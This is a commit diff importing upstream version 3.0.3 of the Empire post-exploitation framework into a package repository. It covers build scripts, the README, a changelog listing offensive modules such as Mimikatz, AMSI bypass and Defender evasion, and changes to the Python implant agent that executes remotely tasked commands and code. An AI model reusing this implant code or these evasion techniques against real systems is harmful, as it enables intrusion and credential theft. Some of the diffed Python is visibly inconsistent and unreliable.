New upstream version 3.0.3
Sophie Brun
4 years ago
0 | #!/usr/bin/env bash | |
1 | set -ex | |
2 | # SET THE FOLLOWING VARIABLES | |
3 | # docker hub username | |
4 | USERNAME=empireproject | |
5 | # image name | |
6 | IMAGE=empire | |
7 | # version | |
8 | VERSION="$(curl -s https://raw.githubusercontent.com/EmpireProject/Empire/master/lib/common/empire.py | grep "VERSION =" | cut -d '"' -f2)" | |
9 | ||
10 | docker build --build-arg empireversion="$VERSION" -t $USERNAME/$IMAGE:latest . |
0 | #!/usr/bin/env bash | |
1 | set -ex | |
2 | # Requires the following packages: git, hub, docker | |
3 | # SET THE FOLLOWING VARIABLES | |
4 | USERNAME=empireproject | |
5 | IMAGE=empire | |
6 | VERSION="$(cat VERSION)" | |
7 | ||
8 | # UPDATE THE SOURCE CODE | |
9 | git pull | |
10 | ||
11 | # bump version | |
12 | read -p "[!] Do you want to BUMP the version? [Y/N] " -n 1 -r | |
13 | echo # (optional) move to a new line | |
14 | if [[ $REPLY =~ ^[Yy]$ ]] | |
15 | then | |
16 | # do dangerous stuff | |
17 | # TODO: CHECK IF WE WANT TO BUMP PATCH or MINOR or MAJOR | |
18 | docker run --rm -v "$PWD":/app treeder/bump minor | |
19 | fi | |
20 | VERSION=`cat VERSION` | |
21 | echo "[*] Current version: $VERSION" | |
22 | ||
23 | # TAF, PULL, MERGE DEV | |
24 | read -p "[!] Do you want to create a new Github Release? [Y/N] " -n 1 -r | |
25 | echo # (optional) move to a new line | |
26 | if [[ $REPLY =~ ^[Yy]$ ]] | |
27 | then | |
28 | # do dangerous stuff | |
29 | git checkout -b "Version-$VERSION" | |
30 | git add --all | |
31 | git commit -m "Empire $VERSION Release" | |
32 | # NO NEED TO TAG IF WE RELEASE | |
33 | # git tag -a "$VERSION" -m "Empire $VERSION Release" | |
34 | git push origin "Version-$VERSION" | |
35 | # git push origin "dev" --tags | |
36 | git checkout master | |
37 | git merge "Version-$VERSION" | |
38 | git push | |
39 | hub release create $VERSION -m "Empire $VERSION Release" | |
40 | fi | |
41 | ||
42 | ||
43 | read -p "[!] Do you want to BUILD Docker image? [Y/N] " -n 1 -r | |
44 | echo # (optional) move to a new line | |
45 | if [[ $REPLY =~ ^[Yy]$ ]] | |
46 | then | |
47 | # do dangerous stuff | |
48 | # ALERT VERSION | |
49 | echo "[*] Building Version: $VERSION" | |
50 | # START BUILD | |
51 | ./.build.sh | |
52 | fi | |
53 | ||
54 | # DOCKER TAG/VERSIONING | |
55 | docker tag $USERNAME/$IMAGE:latest $USERNAME/$IMAGE:$VERSION | |
56 | ||
57 | read -p "[!] Do you want to PUSH to Docker Hub? [Y/N] " -n 1 -r | |
58 | echo # (optional) move to a new line | |
59 | if [[ $REPLY =~ ^[Yy]$ ]] | |
60 | then | |
61 | # do dangerous stuff | |
62 | # PUSH TO DOCKER HUB | |
63 | docker push $USERNAME/$IMAGE:latest | |
64 | echo "Docker image pushed: $USERNAME/$IMAGE:latest" | |
65 | docker push $USERNAME/$IMAGE:$VERSION | |
66 | echo "Docker image pushed: $USERNAME/$IMAGE:$VERSION" | |
67 | fi |
25 | 25 | # set the def shell for ENV |
26 | 26 | SHELL ["/bin/bash", "-c"] |
27 | 27 | |
28 | COPY . /empire | |
29 | ||
30 | 28 | RUN apt-get update && \ |
31 | 29 | apt-get -y install sudo && \ |
32 | 30 | apt-get -y install lsb-release |
31 | ||
32 | COPY . /empire | |
33 | 33 | |
34 | 34 | RUN cd /empire/setup/ && \ |
35 | 35 | ./install.sh && \ |
30 | 30 | Empire is developed by [@harmj0y](https://twitter.com/harmj0y), [@sixdub](https://twitter.com/sixdub), [@enigma0x3](https://twitter.com/enigma0x3), [@rvrsh3ll](https://twitter.com/424f424f), [@killswitch_gui](https://twitter.com/killswitch_gui), [@xorrior](https://twitter.com/xorrior), and [@bcsecurity1](https://twitter.com/BCSecurity1). While the main fork for Empire is no longer maintained, this fork is maintained by [BC-Security](https://www.bc-security.org) and will continue to receive periodic updates. |
31 | 31 | |
32 | 32 | ## Release Notes |
33 | With the release of the 3.0 beta, there are some major upgrades to Empire. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors. | |
33 | There are some major upgrades in Empire 3.0. Many of these have lingered on various branches of the Empire project and have finally been consolidated, as well as, there being several new updates. The biggest change to mention is the conversion of the Empire base code from Python 2.7 to Python 2.7/3.x compatible. This will ensure that Empire continues to function as Kali drops Python 2.7 support. The conversion also causes some issues in the way that bytes and strings are handled which will likely cause some unfound errors. | |
34 | 34 | |
35 | We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. There are still many modules that need to be tested, hence the beta release. | |
35 | We have tested the core http listeners (http, http_hop, http_mapi, redirector) and confirmed that they work in both Python 2.7 and 3.x. We have also tested the Mimikatz modules and several of the launchers. | |
36 | 36 | |
37 | 37 | In addition to the code conversion, there are some minor UI updates, a few new modules, and new functionality. The full list of changes can be reviewed in the changelog. |
38 | 38 | |
60 | 60 | docker run -it --volumes-from data bcsecurity/empire:{version} |
61 | 61 | |
62 | 62 | # if you prefer to be dropped into bash instead of directly into empire |
63 | # or docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash | |
63 | # docker run -it --volumes-from data bcsecurity/empire:{version} /bin/bash | |
64 | 64 | ``` |
65 | 65 | |
66 | 66 | All image versions can be found at: https://hub.docker.com/r/bcsecurity/empire/ |
67 | 67 | * The last commit from master will be deployed to the `latest` tag |
68 | 68 | * The last commit from the dev branch will be deployed to the `dev` tag |
69 | * All github tagged releases will be deployed using their version numbers (v3.0, v3.1, etc) | |
69 | * All github tagged releases will be deployed using their version numbers (v3.0.0, v3.1.0, etc) | |
70 | 70 | |
71 | 71 | ## Quickstart |
72 | 72 |
0 | 11/26/2019 | |
0 | 1/13/2020 | |
1 | 1 | ------------ |
2 | - Version 3.0 Beta Release | |
2 | - Version 3.0.3 Master Release | |
3 | - Updated RESTful API to Python 3 - #49 (@Cx01N) | |
4 | - Fixed credential issue - #65 (@Hubbl3) | |
5 | - Fixed python agent - #52 (@Cx01N, @Hubbl3) | |
6 | - Cleaned up install files - #58 (@Vinnybod) | |
7 | ||
8 | 1/7/2020 | |
9 | ------------ | |
10 | - Version 3.0.2 Master Release | |
11 | - Updated SystemRandom() and maintain API compatibility - #29 (@moloch--) | |
12 | - Fixed invoke-shell code (@Hubbl3) | |
13 | - Fixed meterpreter stager generation - #59 (@Hubbl3) | |
14 | - Fixed lnk and dll launchers - #57 (@C01N) | |
15 | - Fixed multi/macro launcher - #60 (@Hubbl3) | |
16 | - Updated orphaned agent handling - #56 (@Hubbl3) | |
17 | - Fixed pip3 install - #50 (@Hubbl3) | |
18 | - Removed unsupported invoke-shellcode options (@Hubbl3) | |
19 | ||
20 | 12/29/2019 | |
21 | ------------ | |
22 | - Version 3.0.1 Master Release | |
23 | - Fixed sysinfo error - #36 (@Invoke-Mimikatz) | |
24 | - Fixed Debian 10.x docker - #38 (@Vinnybod) | |
25 | - Fixed windows/macro stager error - #30 (@Cx01N) | |
26 | - Fixed upload file error - #30 (@Cx01N) | |
27 | - Fixed meterpreter error - #42 (@Cx01N) | |
28 | - Fixed download file error (@Cx01N) | |
29 | - Fixed scriptcmd error - #45 (@Invoke-Mimikatz) | |
30 | - Fixed print creds error - #31 (@Hubbl3) | |
31 | - Cleaned up print results (@Cx01N) | |
32 | - Fixed long running module issue - #16 (@Hubbl3) | |
33 | ||
34 | Thank you to the contributors for spending time debugging with our team. | |
35 | Please contact us at [email protected] if credit is incorrectly cited. | |
36 | ||
37 | 12/22/2019 | |
38 | ------------ | |
39 | - Version 3.0 Master Release | |
3 | 40 | - Added Python 2.6/7 and 3.x compatibility (@Cx01N, @Hubbl3, @Vinnybod) |
4 | - Improved Windows Defender Evasion | |
41 | - Improved Windows Defender Evasion (@Hubbl3) | |
5 | 42 | - Updated mimikatz binary in Invoke-Mimikatz to version 2.2.0 20191125 (@Cx01N) |
6 | 43 | - Fixed port assignment feature to listeners (@Cx01N) |
7 | 44 | - Fixed issues with http_Hop listener (@Cx01N) |
16 | 53 | - Added Get-KerberosServiceTIcket (@OneLogicalMyth) |
17 | 54 | - Added Invoke-RID_Hijack (@r4wd3r) |
18 | 55 | - Added Invoke-internal_monologue (@audibleblink) |
19 | - Added Get-LAPSPasswords (@audibleblink) | |
56 | - Added Get-LAPSPasswords (@ippsec) | |
20 | 57 | - Added Invoke-SMBLogin (@mvelazc0) |
21 | - Added Sherlock (@_RastaMouse, @audibleblink) | |
58 | - Added Sherlock (@ippsec) | |
22 | 59 | - Added Outlook Sandbox Evasion for Windows Macro launcher (@Cx01N, @Hubbl3) |
23 | - Added Randomized JA3S signature (@Hubbl3) | |
60 | - Added Randomized JA3/S signature (@Hubbl3) | |
24 | 61 | - Added AMSI Bypass based on Tal Liberman's AMSI Bypass (@Hubbl3) |
25 | 62 | - Added Invoke-CredentialPhisher (@quickbreach) |
26 | 63 | - Made Security Bypasses configurable for launchers (@phra) |
27 | - Updated Readme to include install instruction, EOL of Core Devloper support, new contribution rules | |
64 | - Updated Readme to include install instruction, EOL of Core Developer support, new contribution rules (@Hubbl3) | |
28 | 65 | - Added OSX shellcode stager (@johneiser) |
29 | 66 | - Added Invoke-Phant0m (@leesoh) |
30 | 67 | - Added Get-AppLockerConfig (@matterpreter) |
65 | 102 | - Added onedrive listener for powershell agent (@mr64bit) |
66 | 103 | - Added opsec-safe aliases for ls, pwd, rm, mkdir, whoami, and getuid in the python agent |
67 | 104 | - Updated office macro stager for python agent (@import-au) |
68 | ||
69 | ||
70 | 105 | |
71 | 106 | 01/04/2018 |
72 | 107 | ------------ |
440 | 440 | param($JobName) |
441 | 441 | if($Script:Jobs.ContainsKey($JobName)) { |
442 | 442 | $Script:Jobs[$JobName]['Buffer'].ReadAll() |
443 | $Script:Jobs[$JobName]['PSHost'].Streams.Error | |
444 | $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear() | |
445 | 443 | } |
446 | 444 | } |
447 | 445 | |
454 | 452 | $Null = $Script:Jobs[$JobName]['PSHost'].Stop() |
455 | 453 | # get results |
456 | 454 | $Script:Jobs[$JobName]['Buffer'].ReadAll() |
457 | $Script:Jobs[$JobName]['PSHost'].Streams.Error | |
458 | $Script:Jobs[$JobName]['PSHost'].Streams.Error.Clear() | |
459 | 455 | # unload the app domain runner |
460 | 456 | $Null = [AppDomain]::Unload($Script:Jobs[$JobName]['AppDomain']) |
461 | 457 | $Script:Jobs.Remove($JobName) |
0 | from __future__ import print_function | |
1 | 0 | from __future__ import division |
2 | 1 | from future import standard_library |
3 | 2 | standard_library.install_aliases() |
149 | 148 | totalPacket = struct.pack('=H', 1) |
150 | 149 | packetNum = struct.pack('=H', 1) |
151 | 150 | resultID = struct.pack('=H', resultID) |
152 | ||
151 | ||
153 | 152 | if packetData: |
154 | packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore')) | |
153 | if(isinstance(packetData, str)): | |
154 | packetData = base64.b64encode(packetData.encode('utf-8', 'ignore')) | |
155 | else: | |
156 | packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8','ignore')) | |
155 | 157 | if len(packetData) % 4: |
156 | 158 | packetData += '=' * (4 - len(packetData) % 4) |
157 | ||
159 | ||
158 | 160 | length = struct.pack('=L',len(packetData)) |
159 | 161 | return packetType + totalPacket + packetNum + resultID + length + packetData |
160 | 162 | else: |
185 | 187 | """ |
186 | 188 | |
187 | 189 | # print "parse_task_packet" |
190 | ||
191 | if(isinstance(packet, str)): | |
192 | packet = packet.encode('UTF-8') | |
188 | 193 | |
189 | 194 | try: |
190 | 195 | packetType = struct.unpack('=H', packet[0+offset:2+offset])[0] |
194 | 199 | length = struct.unpack('=L', packet[8+offset:12+offset])[0] |
195 | 200 | packetData = packet[12+offset:12+offset+length] |
196 | 201 | remainingData = packet[12+offset+length:] |
197 | return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData) | |
202 | ||
203 | return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData) | |
198 | 204 | except Exception as e: |
199 | # print "parse_task_packet exception:",e | |
205 | print "parse_task_packet exception:",e | |
200 | 206 | return (None, None, None, None, None, None, None) |
201 | 207 | |
202 | 208 | |
204 | 210 | # processes an encrypted data packet |
205 | 211 | # -decrypts/verifies the response to get |
206 | 212 | # -extracts the packets and processes each |
207 | ||
208 | 213 | try: |
209 | 214 | # aes_decrypt_and_verify is in stager.py |
210 | 215 | tasking = aes_decrypt_and_verify(key, data) |
221 | 226 | resultPackets += result |
222 | 227 | |
223 | 228 | packetOffset = 12 + length |
224 | ||
225 | 229 | while remainingData and remainingData != '': |
226 | 230 | (packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking, offset=packetOffset) |
227 | 231 | result = process_packet(packetType, data, resultID) |
255 | 259 | |
256 | 260 | def process_packet(packetType, data, resultID): |
257 | 261 | |
262 | if(isinstance(data, bytes)): | |
263 | data = data.decode('UTF-8') | |
258 | 264 | try: |
259 | 265 | packetType = int(packetType) |
260 | 266 | except Exception as e: |
261 | 267 | return None |
262 | ||
263 | 268 | if packetType == 1: |
264 | 269 | # sysinfo request |
265 | 270 | # get_sysinfo should be exposed from stager.py |
266 | return build_response_packet(1, get_sysinfo(), resultID) | |
271 | send_message(build_response_packet(1, get_sysinfo(), resultID)) | |
267 | 272 | |
268 | 273 | elif packetType == 2: |
269 | 274 | # agent exit |
270 | ||
271 | 275 | send_message(build_response_packet(2, "", resultID)) |
272 | 276 | agent_exit() |
273 | 277 | |
274 | 278 | elif packetType == 40: |
275 | 279 | # run a command |
276 | 280 | parts = data.split(" ") |
277 | ||
278 | 281 | if len(parts) == 1: |
279 | 282 | data = parts[0] |
280 | 283 | resultData = str(run_command(data)) |
281 | return build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID) | |
284 | send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID)) | |
282 | 285 | else: |
283 | 286 | cmd = parts[0] |
284 | 287 | cmdargs = ' '.join(parts[1:len(parts)]) |
285 | 288 | resultData = str(run_command(cmd, cmdargs=cmdargs)) |
286 | return build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID) | |
289 | send_message(build_response_packet(40, resultData + "\r\n ..Command execution completed.", resultID)) | |
287 | 290 | |
288 | 291 | elif packetType == 41: |
289 | 292 | # file download |
290 | 293 | objPath = os.path.abspath(data) |
291 | 294 | fileList = [] |
292 | 295 | if not os.path.exists(objPath): |
293 | return build_response_packet(40, "file does not exist or cannot be accessed", resultID) | |
296 | send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID)) | |
294 | 297 | |
295 | 298 | if not os.path.isdir(objPath): |
296 | 299 | fileList.append(objPath) |
364 | 367 | msg = "Active jobs:\n" |
365 | 368 | for x in range(len(jobs)): |
366 | 369 | msg += "\t%s" %(x) |
367 | return build_response_packet(50, msg, resultID) | |
370 | send_message(build_response_packet(50, msg, resultID)) | |
368 | 371 | |
369 | 372 | elif packetType == 51: |
370 | 373 | # stop and remove a specified job if it's running |
389 | 392 | code_obj = compile(data, '<string>', 'exec') |
390 | 393 | exec(code_obj, globals()) |
391 | 394 | sys.stdout = sys.__stdout__ |
395 | code_obj = compile(data, '<string>', 'exec') | |
396 | exec(code_obj, globals()) | |
392 | 397 | results = buffer.getvalue() |
393 | return build_response_packet(100, str(results), resultID) | |
398 | send_message(build_response_packet(100, str(results), resultID)) | |
394 | 399 | except Exception as e: |
395 | errorData = str(buffer.getvalue()) | |
396 | return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
400 | errorData = str(buffer.getvalue()) | |
401 | return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
397 | 402 | |
398 | 403 | elif packetType == 101: |
399 | 404 | # dynamic code execution, wait for output, save output |
411 | 416 | comp_data = c.comp_data(buffer.getvalue()) |
412 | 417 | encodedPart = c.build_header(comp_data, start_crc32) |
413 | 418 | encodedPart = base64.b64encode(encodedPart) |
414 | return build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID) | |
419 | send_message(build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart, resultID)) | |
415 | 420 | except Exception as e: |
416 | 421 | # Also return partial code that has been executed |
417 | 422 | errorData = str(buffer.getvalue()) |
418 | return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
423 | send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)) | |
419 | 424 | |
420 | 425 | elif packetType == 102: |
421 | 426 | # on disk code execution for modules that require multiprocessing not supported by exec |
439 | 444 | fileCheck = os.path.isfile(implantPath) |
440 | 445 | if fileCheck: |
441 | 446 | result += "\n\nError removing module file, please verify path: " + str(implantPath) |
442 | return build_response_packet(100, str(result), resultID) | |
447 | send_message(build_response_packet(100, str(result), resultID)) | |
443 | 448 | except Exception as e: |
444 | 449 | fileCheck = os.path.isfile(implantPath) |
445 | 450 | if fileCheck: |
446 | return build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID) | |
447 | return build_response_packet(0, "error executing specified Python data: %s" %(e), resultID) | |
451 | send_message(build_response_packet(0, "error executing specified Python data: %s \nError removing module file, please verify path: %s" %(e, implantPath), resultID)) | |
452 | send_message(build_response_packet(0, "error executing specified Python data: %s" %(e), resultID)) | |
448 | 453 | |
449 | 454 | elif packetType == 110: |
450 | 455 | start_job(data) |
451 | return build_response_packet(110, "job %s started" %(len(jobs)-1), resultID) | |
456 | send(build_response_packet(110, "job %s started" %(len(jobs)-1), resultID)) | |
452 | 457 | |
453 | 458 | elif packetType == 111: |
454 | 459 | # TASK_CMD_JOB_SAVE |
465 | 470 | exec(code_obj, globals()) |
466 | 471 | sys.stdout = sys.__stdout__ |
467 | 472 | result = str(buffer.getvalue()) |
468 | return build_response_packet(121, result, resultID) | |
473 | send_message(build_response_packet(121, result, resultID)) | |
469 | 474 | except Exception as e: |
470 | 475 | errorData = str(buffer.getvalue()) |
471 | return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) | |
476 | send_message(build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)) | |
472 | 477 | |
473 | 478 | elif packetType == 122: |
474 | 479 | #base64 decode and decompress the data |
523 | 528 | send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID)) |
524 | 529 | |
525 | 530 | else: |
526 | return build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID) | |
531 | send_message(build_response_packet(0, "invalid tasking ID: %s" %(taskingID), resultID)) | |
527 | 532 | |
528 | 533 | |
529 | 534 | ################################################ |
540 | 545 | class ZipImportError(ImportError): |
541 | 546 | """Exception raised by zipimporter objects.""" |
542 | 547 | |
543 | # _get_info() = takes the fullname, then subpackage name (if applicable), | |
548 | # _get_info() = takes the fullname, then subpackage name (if applicable), | |
544 | 549 | # and searches for the respective module or package |
545 | 550 | |
546 | 551 | class CFinder(object): |
620 | 625 | submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) |
621 | 626 | return compile(source, fullpath, 'exec') |
622 | 627 | |
623 | def install_hook(repoName): | |
624 | if repoName not in _meta_cache: | |
625 | finder = CFinder(repoName) | |
626 | _meta_cache[repoName] = finder | |
627 | sys.meta_path.append(finder) | |
628 | ||
629 | def remove_hook(repoName): | |
630 | if repoName in _meta_cache: | |
631 | finder = _meta_cache.pop(repoName) | |
632 | sys.meta_path.remove(finder) | |
628 | def install_hook(repoName): | |
629 | if repoName not in _meta_cache: | |
630 | finder = CFinder(repoName) | |
631 | _meta_cache[repoName] = finder | |
632 | sys.meta_path.append(finder) | |
633 | ||
634 | def remove_hook(repoName): | |
635 | if repoName in _meta_cache: | |
636 | finder = _meta_cache.pop(repoName) | |
637 | sys.meta_path.remove(finder) | |
633 | 638 | |
634 | 639 | ################################################ |
635 | 640 | # |
724 | 729 | |
725 | 730 | def agent_exit(): |
726 | 731 | # exit for proper job / thread cleanup |
732 | print('exiting agent') | |
727 | 733 | if len(jobs) > 0: |
734 | print('jobs still running') | |
728 | 735 | try: |
729 | 736 | for x in jobs: |
730 | 737 | jobs[int(x)].kill() |
942 | 949 | cmdargs = '.' |
943 | 950 | |
944 | 951 | return directory_listing(cmdargs) |
945 | ||
952 | if re.compile("cd").match(command): | |
953 | os.chdir(cmdargs) | |
954 | return str(os.getcwd()) | |
946 | 955 | elif re.compile("pwd").match(command): |
947 | 956 | return str(os.getcwd()) |
948 | 957 | elif re.compile("rm").match(command): |
1 | 1 | Implements AES in python as a jinja2 partial. |
2 | 2 | AES code from https://github.com/ricmoo/pyaes |
3 | 3 | """ |
4 | ||
5 | from builtins import bytes | |
6 | from builtins import chr | |
7 | from builtins import zip | |
8 | from builtins import str | |
9 | from builtins import range | |
10 | from builtins import object | |
11 | 4 | import copy |
12 | 5 | import struct |
13 | 6 | import hashlib |
14 | 7 | import random |
15 | 8 | import hmac |
16 | ||
17 | ||
18 | def _concat_list(a, b): | |
19 | return a + b | |
9 | import os | |
20 | 10 | |
21 | 11 | def to_bufferable(binary): |
22 | 12 | return binary |
30 | 20 | def _string_to_bytes(text): |
31 | 21 | return list(ord(c) for c in text) |
32 | 22 | |
33 | def _compact_word(word): | |
34 | return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3] | |
35 | ||
36 | # Python 3 compatibility | |
37 | try: | |
38 | xrange | |
39 | except Exception: | |
40 | xrange = range | |
41 | ||
42 | # Python 3 supports bytes, which is already an array of integers | |
43 | def _string_to_bytes(text): | |
44 | if isinstance(text, bytes): | |
45 | return text | |
46 | return [ord(c) for c in text] | |
47 | ||
48 | # In Python 3, we return bytes | |
49 | def _bytes_to_string(binary): | |
50 | return bytes(binary) | |
51 | ||
52 | # Python 3 cannot concatenate a list onto a bytes, so we bytes-ify it first | |
53 | def _concat_list(a, b): | |
54 | return a + bytes(b) | |
55 | ||
56 | def to_bufferable(binary): | |
57 | if isinstance(binary, bytes): | |
58 | return binary | |
59 | return bytes(ord(b) for b in binary) | |
60 | ||
61 | def _get_byte(c): | |
62 | return c | |
63 | 23 | |
64 | 24 | def append_PKCS7_padding(data): |
65 | 25 | pad = 16 - (len(data) % 16) |
66 | return data + to_bufferable(chr(pad) * pad) | |
26 | return data + to_bufferable(chr(pad).encode('UTF-8') * pad) | |
67 | 27 | |
68 | 28 | def strip_PKCS7_padding(data): |
69 | 29 | if len(data) % 16 != 0: |
71 | 31 | |
72 | 32 | pad = _get_byte(data[-1]) |
73 | 33 | return data[:-pad] |
34 | ||
35 | def _compact_word(word): | |
36 | return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3] | |
37 | ||
74 | 38 | |
75 | 39 | class AES(object): |
76 | 40 | '''Encapsulates the AES block cipher. |
246 | 210 | |
247 | 211 | return result |
248 | 212 | |
249 | ||
250 | def decrypt(self, ciphertext): | |
251 | ||
252 | if len(ciphertext) != 16: | |
253 | raise ValueError('wrong block length') | |
254 | ||
255 | rounds = len(self._Kd) - 1 | |
256 | (s1, s2, s3) = [3, 2, 1] | |
257 | a = [0, 0, 0, 0] | |
258 | ||
259 | # Convert ciphertext to (ints ^ key) | |
260 | t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in range(0, 4)] | |
261 | ||
262 | # Apply round transforms | |
263 | for r in range(1, rounds): | |
264 | for i in range(0, 4): | |
265 | a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^ | |
266 | self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^ | |
267 | self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^ | |
268 | self.T8[ t[(i + s3) % 4] & 0xFF] ^ | |
269 | self._Kd[r][i]) | |
270 | t = copy.copy(a) | |
271 | ||
272 | # The last round is special | |
273 | result = [ ] | |
274 | for i in range(0, 4): | |
275 | tt = self._Kd[rounds][i] | |
276 | result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF) | |
277 | result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF) | |
278 | result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF) | |
279 | result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF) | |
280 | ||
281 | return result | |
282 | ||
283 | 213 | class AESBlockModeOfOperation(object): |
284 | 214 | '''Super-class for AES modes of operation that require blocks.''' |
285 | 215 | def __init__(self, key): |
302 | 232 | elif len(iv) != 16: |
303 | 233 | raise ValueError('initialization vector must be 16 bytes') |
304 | 234 | else: |
305 | self._last_cipherblock = _string_to_bytes(iv) | |
235 | if isinstance(iv, str): | |
236 | self._last_cipherblock = _string_to_bytes(iv) | |
237 | self._last_cipherblock = iv | |
306 | 238 | |
307 | 239 | AESBlockModeOfOperation.__init__(self, key) |
308 | 240 | |
310 | 242 | if len(plaintext) != 16: |
311 | 243 | raise ValueError('plaintext block must be 16 bytes') |
312 | 244 | |
313 | plaintext = _string_to_bytes(plaintext) | |
245 | plaintext = plaintext | |
314 | 246 | precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)] |
315 | 247 | self._last_cipherblock = self._aes.encrypt(precipherblock) |
316 | 248 | |
320 | 252 | if len(ciphertext) != 16: |
321 | 253 | raise ValueError('ciphertext block must be 16 bytes') |
322 | 254 | |
323 | cipherblock = _string_to_bytes(ciphertext) | |
255 | cipherblock = ciphertext | |
324 | 256 | plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)] |
325 | 257 | self._last_cipherblock = cipherblock |
326 | 258 | |
329 | 261 | |
330 | 262 | def CBCenc(aesObj, plaintext, base64=False): |
331 | 263 | |
332 | # First we padd the plaintext | |
264 | # First we pad the plaintext | |
333 | 265 | paddedPlaintext = append_PKCS7_padding(plaintext) |
334 | 266 | |
335 | 267 | # The we break the padded plaintext in 16 byte chunks |
336 | 268 | blocks = [paddedPlaintext[0+i:16+i] for i in range(0, len(paddedPlaintext), 16)] |
337 | 269 | |
338 | 270 | # Finally we encypt each block |
339 | ciphertext = "" | |
271 | #ciphertext = "" | |
272 | ciphertext = ("") | |
340 | 273 | for block in blocks: |
341 | ciphertext += aesObj.encrypt(block) | |
342 | ||
274 | ciphertext = "".join([ciphertext, aesObj.encrypt(block)]) | |
275 | #ciphertext += aesObj.encrypt(block) | |
276 | ciphertext = ciphertext.encode('latin-1') | |
343 | 277 | return ciphertext |
344 | 278 | |
345 | 279 | |
360 | 294 | |
361 | 295 | |
362 | 296 | def getIV(len=16): |
363 | return ''.join(chr(random.randint(0, 255)) for _ in range(len)) | |
297 | rng = random.SystemRandom() | |
298 | return ''.join(chr(rng.randint(0, 255)) for _ in range(len)) | |
364 | 299 | |
365 | 300 | |
366 | 301 | def aes_encrypt(key, data): |
368 | 303 | Generate a random IV and new AES cipher object with the given |
369 | 304 | key, and return IV + encryptedData. |
370 | 305 | """ |
371 | IV = getIV() | |
306 | if isinstance(data, str): | |
307 | data = data.encode('UTF-8') | |
308 | if isinstance(key, str): | |
309 | key = key.encode('UTF-8') | |
310 | IV = os.urandom(16) | |
372 | 311 | aes = AESModeOfOperationCBC(key, iv=IV) |
373 | return IV + CBCenc(aes, data) | |
374 | ||
312 | CBC = CBCenc(aes, data) | |
313 | if isinstance(CBC, str): | |
314 | CBC = CBC.encode('UTF-8') | |
315 | return IV + CBC | |
375 | 316 | |
376 | 317 | def aes_encrypt_then_hmac(key, data): |
377 | 318 | """ |
378 | 319 | Encrypt the data then calculate HMAC over the ciphertext. |
379 | 320 | """ |
321 | if isinstance(key, str): | |
322 | key = bytes(key, 'UTF-8') | |
323 | if isinstance(data, str): | |
324 | data = bytes(data, 'UTF-8') | |
325 | ||
380 | 326 | data = aes_encrypt(key, data) |
381 | mac = hmac.new(str(key), data, hashlib.sha256).digest() | |
327 | mac = hmac.new(key, data, hashlib.sha256).digest() | |
382 | 328 | return data + mac[0:10] |
383 | 329 | |
384 | 330 | |
396 | 342 | """ |
397 | 343 | Verify the HMAC supplied in the data with the given key. |
398 | 344 | """ |
345 | if isinstance(key, str): | |
346 | key = bytes(key, 'latin-1') | |
347 | ||
399 | 348 | if len(data) > 20: |
400 | 349 | mac = data[-10:] |
401 | 350 | data = data[:-10] |
402 | 351 | expected = hmac.new(key, data, hashlib.sha256).digest()[0:10] |
403 | 352 | # Double HMAC to prevent timing attacks. hmac.compare_digest() is |
404 | 353 | # preferable, but only available since Python 2.7.7. |
405 | return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest() | |
354 | return hmac.new(key, expected).digest() == hmac.new(key, mac).digest() | |
406 | 355 | else: |
407 | 356 | return False |
408 | 357 | |
411 | 360 | """ |
412 | 361 | Decrypt the data, but only if it has a valid MAC. |
413 | 362 | """ |
363 | ||
414 | 364 | if len(data) > 32 and verify_hmac(key, data): |
365 | if isinstance(key, str): | |
366 | key = bytes(key, 'latin-1') | |
415 | 367 | return aes_decrypt(key, data[:-10]) |
416 | 368 | raise Exception("Invalid ciphertext received.") |
369 |
